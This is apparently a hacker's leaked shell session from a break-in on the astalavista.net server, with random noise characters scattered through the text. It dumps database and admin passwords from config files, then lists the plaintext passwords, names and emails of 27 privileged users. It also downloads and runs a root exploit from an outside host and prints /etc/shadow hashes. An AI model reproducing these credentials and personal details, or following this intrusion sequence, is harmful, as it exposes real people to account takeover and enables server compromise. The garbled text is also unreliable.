1 l* r, L+ F* v( d* N3 ]# ndrwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend9 y8 j6 B' v; v$ V, g
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
8 Y* z( l: F% f, `+ P- C-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg) y2 e& A+ G7 R* p: ]
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config9 N j \2 K- W6 n. M- s
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron& H9 M. d5 E0 r5 l7 E
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd4 p% X0 i6 a' s( r
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
0 O9 O9 ~% H; X3 G* L9 o9 x-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico" x# p* ?: x. b$ W) Y
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
9 c" p1 }9 j9 qdrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour4 x! |. O: l5 z( a/ I' ~, ]2 J/ L
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess: S. L, q8 D2 a( q5 S( ]
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
! R% W4 x4 B4 t. g. g4 o-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php& `; M4 R/ Y, m/ b
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
: y8 J, n* g$ |2 ^9 f-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php/ s8 V2 d& W" i- p+ Z& {
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php6 G& ^7 a$ i, g- w* |3 [( V+ }
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
0 y3 j& w+ @* f1 X/ O" T# c4 e0 udrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
8 V5 v H, c; e a0 z& S- z+ qdrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang$ s1 [0 p3 ~5 ?4 Q$ P
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
( N, y. A& Q# n& Udrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
u* y; S+ U& n, U7 Adrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member. U* i' G$ f& M8 X9 ]
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata0 ^# @* T2 n( q3 O& n
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new; G$ a1 t* T, O
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
, A- b |7 i9 B6 q* ^drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
. G" [' M: ^3 h* _" C-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt/ o2 l' R; C3 @
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss+ q# o1 a Q ?
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources: R4 G- ^3 x) I* Z- Q$ b9 D9 o
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com( P; S0 p4 |, v3 v6 W# i
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes q5 I P! k0 F8 U; u2 j
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
& q; Z T& k7 f+ B) sdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
" L$ k, o y, f* D; k- _drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v23 v6 l. [ l, m4 `1 `7 O9 A9 s
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
8 ?/ H- a) U9 S-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php/ s Y+ S7 @+ a- T. N6 w
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki5 d& D8 C6 J' r& p
- z. n5 N/ @/ j& X* S8 n; B
sh-3.2$ head -20 index.php0 n; I& ]! y: V1 i
<?PHP
. K+ S% U; K# l8 t! w0 p/**
6 {+ K9 l2 l$ t4 V0 c D" H# F* Mainfile (external) for astalavistaNET v2.07 o' j3 q% U! o/ N( j" Y: G- a; F
*
# q1 S- t; J8 f1 c! a& F* @copyright Astalavista IT Engineering GmbH1 v0 ] D8 p( W, U
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>& z- q4 V1 ~' g# d3 ~1 }- j) b- r
* @version 1.0
- s! L+ B' J, u5 G*/
" I$ z8 n% F8 O+ C v5 d; r3 X+ j# G. o/ T
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {3 R0 a+ u- _' ~5 v- w, W9 s
$dontStartSession = false;
# b3 u% [8 f9 O# H } else {
6 S+ Q7 h: o' z( i $dontStartSession = true;, L6 O. ]1 U+ Y$ Q) X! p$ A) m
}; i1 J+ ^6 s( l, x4 K; i/ D# f+ u
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
1 C* C1 j% [ G2 [8 j4 z3 J require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);: \, h) e, y5 q' H7 C. g
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
+ C2 o# v3 P8 h5 t8 W0 c require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
T9 B7 g H6 w% W
0 |) j& w6 U6 M( Nsh-3.2$ cd config5 E [/ D# P8 `4 P0 @
sh-3.2$ ls -la
. M% o3 `" y- n# [4 A/ c9 stotal 32
. R1 L3 m3 A: l) P4 n( x+ Vdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
' b7 C8 b J0 x. Q( M: fdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..! k% I6 _% m/ [" P
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php; t9 N* Z. x+ H$ `3 `
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php& g( a" t/ ~/ B) o2 z& u+ q. V
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
# [4 W) M# H% K) Y: _. ^1 h-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
2 F5 Y- O7 d% L7 N B7 Z-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php3 X) b4 b8 ^- ]# T* ~) c0 [
0 o% _7 {" Y8 J. f9 F" {sh-3.2$ cat com.conf.php. T+ d' O+ S" N8 W
[snip]# V' f3 a) ]' ~4 V
//member-database ~; w2 g: h& n$ x8 Z2 q+ X, k7 H
$_CONFIG['db_mem_server'] = ‘localhost’;" N5 \8 n3 G- R) c
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;6 `1 c, {% j6 L9 b6 M- u# L) e
$_CONFIG['db_mem_user'] = ‘astanet_db’;% E" ^6 o( p6 ?! }, D( y4 h
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
4 X5 Y c( d6 q; I0 A0 n$_CONFIG['db_mem_debug'] = false; //true or false
9 F- m! _& o2 q6 k) m" u//ads-database6 H* h7 ]+ i& u* p( ~+ W/ l& g+ n7 u7 C
$_CONFIG['db_ads_server'] = ‘localhost’;
! }2 D& K6 ]$ t& E2 j2 Q2 [0 b$_CONFIG['db_ads_database'] = ‘astanet_ads’;5 Z5 Y& i' |9 W4 q
$_CONFIG['db_ads_user'] = ‘astanet_db’;
- j& e5 R7 j6 T6 V% |$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
4 ]. I4 \% W$ b8 _( r f5 Q$_CONFIG['db_ads_debug'] = false; //true or false) i+ g8 B7 @2 w+ c$ w3 q
//rainbow-database
6 l$ a( K! @0 B5 r$ ~$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
5 J- \' [4 m- G" J$_CONFIG['db_rainbow_database'] = ‘rainbow’;
( @# q! w4 T, P, P' Z$_CONFIG['db_rainbow_user'] = ‘dinu’;
4 O4 H6 u' L( a$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
! |0 T7 d' b4 ^0 ]* Y( [$ P$_CONFIG['db_rainbow_debug'] = false; //true or false
9 v: i$ F$ B/ J$ G" C# I//mailing lists database
e( b |8 V" U- W$ x. ^4 M$_CONFIG['db_mailing_lists_server'] = ‘localhost’;. H1 F# v \2 B$ j5 d/ i
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;! K1 {- l1 v: j# x
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
9 Z% q' c* k5 R$ a. S$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;9 Y9 V$ u4 j: e5 L
$_CONFIG['db_mailing_lists_debug'] = false; //true or false
6 T0 P6 {) B- }//paypal
2 [# `" }6 u# ~0 m$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
. S: T: |4 i: T9 L( R( H$_CONFIG['sub_pp_cmd'] = ‘_xclick’;) \# Q/ x. a2 v4 @
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
' T" U& w3 V2 s6 D _' W$_CONFIG['sub_pp_noship'] = ‘1′;& p2 U9 }) a, K
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
& ?& j0 J/ d' u( D[snip]2 T" j! _8 R e4 @8 j
4 m4 X4 Z$ c$ k4 k/ I! m
sh-3.2$ cd ..
1 Q9 s7 k. i' d5 L) Tsh-3.2$ cd member+ ~7 S$ p1 s' U1 y+ {) R. I
sh-3.2$ ls -la
$ U9 j/ R+ o4 a# q" [$ A8 atotal 200 a% K. r% L, H7 R5 K' F3 Q
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .. a. H' E5 `% D6 c- M
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..; Q: x: K/ I; S( X
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess* j E% T. K; u5 g M! D
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
: W& F2 R d' p. q; l- D! R* T0 V5 d% Nsh-3.2$ cat .htaccess
8 q: `3 m. o, G& o2 iSecFilterEngine off
) O* r. d- _6 X/ F7 x( e: s3 ~
. T' g0 w# j) u; [sh-3.2$ cd .." R: o2 A6 B" J4 L) |1 O3 W1 a
sh-3.2$ cd cron( ]: V$ P% M5 v, x
sh-3.2$ ls -la
" ?& s& @1 x& y3 ~8 A atotal 168
1 `* k# v/ i, f* Vdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
}8 u9 O! p! b+ Ddrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
" _/ T, a5 v6 @* A$ @* l-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
2 W- I3 B% w4 P- v8 _! U-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php5 t# T' Y# h0 i* c; I2 K* o; [
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php2 g( I8 }, l3 k
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
) ?, v- o* p- u8 M6 _9 _% V1 T/ v-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php' s! S! H4 O: S6 }) @+ S
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
& u8 F1 Z* q: H-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
1 G- N+ _' E# f e/ O& w) {- S1 o$ V-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
; b7 z; o. i' m5 N! \, U7 ]) Y' t-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh8 h. b/ k) e9 g8 H$ N9 e
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
$ K- N5 r4 k- m" K/ A6 ?# `-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php+ M: P. v _* f' r
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php! p! v4 k j6 U+ ~+ u2 C
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
1 n& A- X" t, p-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php, I. W1 Q5 n' m1 Z1 z
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php8 }* v/ X8 D/ ^$ P
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
4 {9 A# G: h2 K e9 ]% G-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
5 |' z: U4 p2 J% h% U% I; L-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
# t A. H8 C( p Hdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email/ w E$ I" M% A
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php4 L8 m5 {7 Y( Q' }1 M
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
! ?$ u' ^, o) [' e% O4 w* U; k6 V( ]+ s: h7 v/ @& m, M: I
sh-3.2$ cd .. B- r5 H% r: _
sh-3.2$ cd _007, C- _& v8 @4 ^1 Q
sh-3.2$ ls -la) J8 ~! B, ~6 B) V
total 24
2 m, a1 Y# L% \$ ]' U$ ~" ]6 qdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .. W) H- |1 G6 O4 |" k* m
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
/ Q4 ?0 e1 K6 L: v K" A; q. D-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess! u" V3 Q: @1 D3 B' ]( ]
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php- \/ X' b5 T. x- X$ o* Z+ e. W
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
" C0 o! d' A& z- {4 F2 o( E1 O1 Kdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
Y1 J& U/ n/ s3 T! v+ u
' E% C( k0 ]+ U( qsh-3.2$ cat .htaccess
/ p2 {1 ?6 ]$ F3 pauthType Basic" Z4 ]8 Q( u2 i; Q( g4 ^
authName Admin- T4 ], T$ m) s- |
authUserFile /home/astanet/auth/.htadm_pwd+ h# Q( y7 |6 N- I% `
require valid-user
9 j1 U3 E, S2 b$ S& V; l" s
$ \# l" c5 \3 w% ksh-3.2$ cat /home/astanet/auth/.htadm_pwd% T9 Z! y. n' C: L; L! u& u
admin2net:CR0bl65MwhfT
7 K& d4 v. y& Z) j0 T" B# d) f% N4 @+ |8 z+ W4 q. n
sh-3.2$ mysql -u astanet_db -p
$ g# q9 ]0 f5 j! _' xEnter password:
, Q! h! e7 O# o( |/ U y1 `$ A! tWelcome to the MySQL monitor. Commands end with ; or \g.3 C& g8 B2 m2 Q. e. @. X" j6 w( G
Your MySQL connection id is 275153
" X' ~9 A* |5 \3 B# |; \5 gServer version: 5.0.45-community-log MySQL Community Edition (GPL)- v& C% [; Q4 [+ f
0 ~7 h( `, W$ D& r
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
0 t0 A" b% ?+ J$ G
4 H: r1 }: d% Z* A, l# ~mysql> show databases;
* U# p8 d, [# f+———————–+$ Q8 k/ H, Y6 O
| Database |6 L1 A) h9 X" T7 q% l/ ^+ q7 R- D
+———————–+
, V( w* e0 ?! X" P3 j% s" t( v' I# \| information_schema |
/ }& A: l9 s j4 V0 `' R- V, S* O| astanet_ads |
# I8 z; ~' S9 d| astanet_mailing_lists |& N( J6 Z, q3 ~
| astanet_mediawiki |
4 j4 J h0 `/ _. Z( n' e! K' l5 s| astanet_membersystem |
0 o5 x' q& f" Q1 h* L$ m| test |9 S0 R k5 U0 ^
+———————–+
% a2 {" @4 G- b' D6 B6 rows in set (0.00 sec): ]* j0 s$ ]' F* F% @8 N
9 @" Y$ |% ^3 a e
mysql> use astanet_membersystem) n. J+ K1 F4 u/ R& I( |
Database changed
6 W. M9 A# P. |$ s9 z4 e1 h; rmysql> show tables;, A! ?: z3 ~6 V' p D+ E5 }
+———————————–+! e4 a1 Z" }1 {. p2 _- s
| Tables_in_astanet_membersystem |; b: N; X. k L& Y, {1 o3 }7 |
+———————————–+
; W5 ?2 t. B$ [3 W" E, Z: p1 ]- M| blacklist_categories |1 N# \! P2 U; r, L
| blacklist_content |6 D# [$ w* s5 m$ o
| blacklist_levels |
( p3 X& k( p6 v/ d j| blacklist_mcset |8 u8 m$ T# g. A& u" w
| dir_categories |' n' K" \ @- [8 [* I. b+ i
| dir_comments |( c* N/ Q. {6 u2 g, f& E
| dir_links |
* r6 g8 x$ J/ u; ?4 c| dir_temp |6 A# { b1 k1 P
| dir_votes |* B7 b! p& n* C) s8 E
| documents |6 c4 N0 a7 R! u' ]
| documents_categories |9 J2 K- [5 G9 F4 \! g7 w) S
| email_content |: B0 M1 u, T4 ^* n
| email_settings |
: M& Q/ S& f: Y: g1 O| exploits |
+ q0 E3 Y/ J% ^4 w: s| exploits_categories |* A: K: F: \* ]$ }
| exploittree_categories |
! M6 q, Z: Y- {| exploittree_exploits |
6 w3 X; j W$ x3 c; [| home_values |
; b+ b, g! \. ]! k. @2 J; v& t| iso_countries |; V# Y! [- R- B! K* a6 M" O3 h1 R
| links_categories |( P; x j7 W2 z0 \6 P- P
| links_records |
+ [% J' \, a) B: y; o5 ^3 e( N' R) D| links_unauth |+ ^# i2 j% A" C% |. T1 d
| links_votes |
( Q9 ^* M, Z1 G1 ^& p| log |
7 W9 G( S3 C: k4 a| news_categories |
: q4 w: ~/ ]- U# g' P| news_comments |' ~6 r. `; A/ W7 e0 l
| news_emoticons |$ L. P8 u( S0 Q* K v% _
| news_latest |# T, Y6 p$ ]; ]2 ]4 y2 |6 c9 a; u$ `# C
| news_messages |
e0 {, Y) J1 [; I" \ w5 {| news_statistics |
2 @1 ~- M. k$ g% ]5 Y| news_votes |
: M e# r3 ` C! n9 ]| prices_content |1 t3 @, ]8 Z( u9 ?! @) U8 z
| prices_offers |
6 d1 x8 j6 e( i1 j| rss_settings |# Y0 n0 R# g1 e9 c+ \* s/ N) r
| sessions |& _: V1 c( l: w8 V. R
| stats_signups |
7 T1 v, I" V6 R D6 o. ^, r| u2u2 |0 P4 Y1 G5 l/ [! r6 O! h
| u2u_contact |
. a+ H7 o# E- X/ c* N| u2u_settings |5 N" a% s; x+ E- R1 [0 A: ^% {* k! k7 X( R
| user_keywords_selected_categories |
9 h8 ]# }, a7 I| users |
% Q/ P- c3 c0 Z+ Q* P5 S| users_ipn_test |
0 ]7 p; C1 Y# ?( X a" J# m$ y| users_keyword_values |: C3 A5 Q5 e2 w) z W6 n" w
| users_profile |
w, S' S V7 X" ~| users_temp |
4 p" ~2 N0 X3 o! m% Y| users_upgrade |
6 M" ?* b8 x2 y" v. j+ A# m h1 N+———————————–+1 r+ L* V% T. D
46 rows in set (0.00 sec)% g8 I9 _! n+ a5 i
# g: ~* b+ y( I4 L% ~mysql> describe users; d$ a4 G b5 }* O9 a
+————————–+————————————–+——+—–+———————+—————-+9 e& l% ~+ v) m4 r2 C
| Field | Type | Null | Key | Default | Extra |
, e/ \; r' i! K+————————–+————————————–+——+—–+———————+—————-+
( _1 N' W2 B, s+ E$ J| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |" X3 P+ j, C. T1 N1 x8 O2 N
| user | varchar(50) | NO | | | |
4 U& A% k8 D6 O2 ^9 W9 L| nickname | varchar(30) | NO | MUL | anonymous | |9 u4 o/ j, a% {" d5 E, U
| password | varchar(30) | NO | | | |
z% T/ U9 f$ B1 N# a/ U# `& A/ ?| userlevel | tinyint(3) | YES | MUL | NULL | |
, u9 K- q5 H- f( M: U Z| exp | int(8) unsigned | NO | | 0 | |1 z- ?7 X6 A7 Q' a- \# d
| email | varchar(50) | NO | | | |5 R" C+ m9 ], r" _' `
| ip | varchar(15) | NO | | 0 | |
1 W+ F' X- s9 X6 H* h$ _/ ]# ~| proxy | set(’0′,’1′) | NO | | 0 | |6 j* i o: O, e5 C7 g
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |5 ~5 P8 Z( D' S/ X
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | | Y( s, t/ _4 i8 Z2 ?7 |
| anz_in | tinyint(1) | NO | | -1 | |
" ~* `" N' c0 q" r; G| status | tinyint(1) unsigned | NO | | 0 | |
" e$ K* A& n# z# |# {| checked | set(’0′,’1′,’2′) | NO | | 0 | |
6 E* C+ W( j% Y j| freemember | set(’0′,’1′) | NO | | 0 | |9 e. H* S/ W* r* c n1 p! L
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
/ W' t2 M+ C5 x! u F* z| lang | tinytext | NO | | | |9 j; T% J3 ]8 \; T' i
| adid | smallint(6) | NO | | 0 | |3 K4 D4 m: I/ Q3 X+ ^
| pp_txn_id | varchar(255) | YES | | NULL | |+ a! J2 } c+ x3 `4 {/ ^7 S
| cnb_transaction_id | varchar(255) | YES | | NULL | | E! {8 s' V8 x
| cnb_order_id | varchar(255) | YES | | NULL | |. g w6 D% k8 T4 p
| cnb_user_id | int(11) | YES | | 0 | |
3 \3 u/ \0 u& f1 v& A+————————–+————————————–+——+—–+———————+—————-+
+ |0 x" ?0 F9 ~! h22 rows in set (0.01 sec)* q& K" ?5 d+ a/ R6 p
5 @9 ]6 x+ O* u% F1 o
mysql> select count(*) as skids from users;
' _3 E& o/ `# i+——-+, f. i5 F& A/ f
| skids |
/ A& U/ b3 f, }: q, T. A+——-+
" @+ n# K0 s; P' I/ @) {1 q| 25199 |
* {% r, N9 d8 X1 Q6 a+——-+
- } o/ s4 _4 H: g0 H* w7 X2 m G1 row in set (0.00 sec)
1 l( k- X8 T5 x. Z2 f- A$ [* ~8 j9 r+ r3 A* H
mysql> select user,nickname,password,email from users where userlevel = 1;) Z+ ~# M1 M* p) M4 L* i B5 L
+————————–+———————-+——————+———————————–+
$ F2 u5 u7 }# i6 M8 n| user | nickname | password | email |
# c! T3 W& h4 R6 F# I! g3 K+————————–+———————-+——————+———————————–+
$ j5 j- d0 W5 y. \: V| pascal | prozac | astaman3 | 链接标记info@astalavista.net | e; `1 A0 U! F
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |! T+ C0 @9 E+ @, b" I1 Y% j- [
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |5 [. R' X; D. ~$ i( H0 `4 u+ a$ V, n( d
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |4 G7 D: ^5 g4 Q5 h
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |) Q4 w5 h, c: c. X& w& p
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
# P& I* `* p$ G) O" Q2 d! |& V| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |5 h! G: Y$ K0 p- V1 C2 `3 w
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
$ Y7 P+ {# O+ N% L- j! v! i| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
9 R* C+ a; b0 X- t7 y, W l0 y| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |$ V8 F) x9 [, W7 T8 b7 J0 U) K0 R
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |- g" C J9 c! o: P
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
( R& ~0 v- g" u| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
* w6 g0 l- o6 y" d) j5 R+ _| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
& R4 T3 ~( u$ l0 Q& I) S| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |; q+ Q( n! y5 ^' J
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
% a3 F/ {2 V; x| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |5 ~3 |/ x6 Q( p2 d. T
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
( G& n" C4 x9 E6 m9 g9 j4 X| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |) w& C/ k' I& r4 _
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
' w! K) s: {1 _9 Z2 H| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |8 t/ M. p5 p N& U
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
% ~! C2 I# f O" m| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
& C: n6 P& J' n# [| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
7 P; _. q5 l& E3 W" ?- B6 z0 d| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |( B2 x2 v) V: Y& z/ I8 }
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
$ \" A. z" I; W$ h' Q; H9 r# G4 w| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
' c6 ]5 O( x5 i2 D4 R" ~& W( e4 V+————————–+———————-+——————+———————————–+* L3 `0 \: g7 |, a2 g8 }1 i6 x
27 rows in set (0.00 sec)) V9 @4 ~! n. f s6 i) S9 h
0 V1 T" u$ q% j, k2 n# ^
mysql> exit;7 b- w" M- Y# }% k' z
Bye
0 \# \# Y# U3 v/ p0 m
, T2 D+ v q. Y1 r( p5 x[~] plaintext passwords? yes,
# p5 M$ q+ [+ N8 v. w- G% d8 vThose so called “security professionals” who charge you $6.66 / month to, ~7 f2 t. B) O/ ^$ z* d! k! C
register at their hack-proof portal, save your passwords in plaintext…
/ @, v, r: K- T+ \& h+ pbrilliant!
& y# D& E: n0 k; j0 f! ?6 B/ H, N& \7 ^1 y' M# `+ g3 m" T% v* Y
[~] This been fun but we want more.
* {- ^8 D- I$ S& _' }# N P: O, J" h: K4 F7 N* ?2 @* `. S
sh-3.2$ uname -a# I6 f3 d- W: ~
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux# k- K3 ] H& y- o6 t
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]0 c1 p W* ~! o
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]# |5 C- i) q0 T* ?8 g
Resolving anti.sec.labs… 13.33.33.37
3 z& J \) w tConnecting to anti.sec.labs|13.33.33.37|:80… connected.9 }; H5 t6 U( |' n
HTTP request sent, awaiting response… 200 OK+ B1 } u3 Y/ T; c
Length: 18200 (18K) [text/plain]
0 j% d4 {3 {: d- I8 u$ W7 ESaving to: `g0troot’
! I+ y: U" g0 b$ `) s0 \; t, m5 d6 n) E; L
100%[=========================================================================================================================================>] 18,200 58.6K/s in- m8 Y0 u* d+ c e1 s
0.3s4 @ z( F# X' ~4 d' s( b7 n
/ F0 F5 B8 S! a18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]; y" ], U* \8 B5 {
1 w/ z6 A k% u, U1 W8 n) c4 Ish-3.2$ ./g0troot -i x86_649 S# _' j" s0 s! P$ t6 H" g0 l" P
[+] g0troot - anti.sec.labs
e% D$ O0 W I% f- c! |9 w# r[+] Target: 2.6.18-128.1.10.el5
* a! R K* z9 d$ [: p7 }" g[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
) f5 J" p- T7 t) [% V
! ^/ e* `/ M2 A1 s( e* w" s[+] r00tr00t8 z4 ~! Z7 }& S# ^* O
[~] Executing shell…
& U+ N) [; a+ T# r# \& S+ b
" A0 d: ], e* s8 Z$ hsh-3.2# id e8 S0 r; n: p" ]' I( w6 J
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)( z2 E! E" x$ [4 s( e: m% m
4 ]4 t5 Y/ ?; t% j3 lsh-3.2# cat /etc/shadow
; }% B6 g; g6 h" ?5 `. X; i* e4 droot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::, ^- [& V2 l, F! `8 h% {) [
[snip]1 N7 P. g) Z4 k# S) u
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::+ b+ s! ^) g" ?5 ^1 `
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::% d2 {+ _$ }% _% }
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
/ I# v! l4 h* k* \2 g# x$ E3 Sastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
7 {9 C- l& i$ E* C, y
. q# v7 R% |, b- A' ?sh-3.2# cat /etc/motd
& d- P6 P( ?- |. L3 D1 @2 k+ T#####################################################
0 X/ O, C7 x" Q6 h9 r) l) q( N#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
& V) y+ p; K3 h* g# |__| [__ | |__| | |__| | | | [__ | |__| #
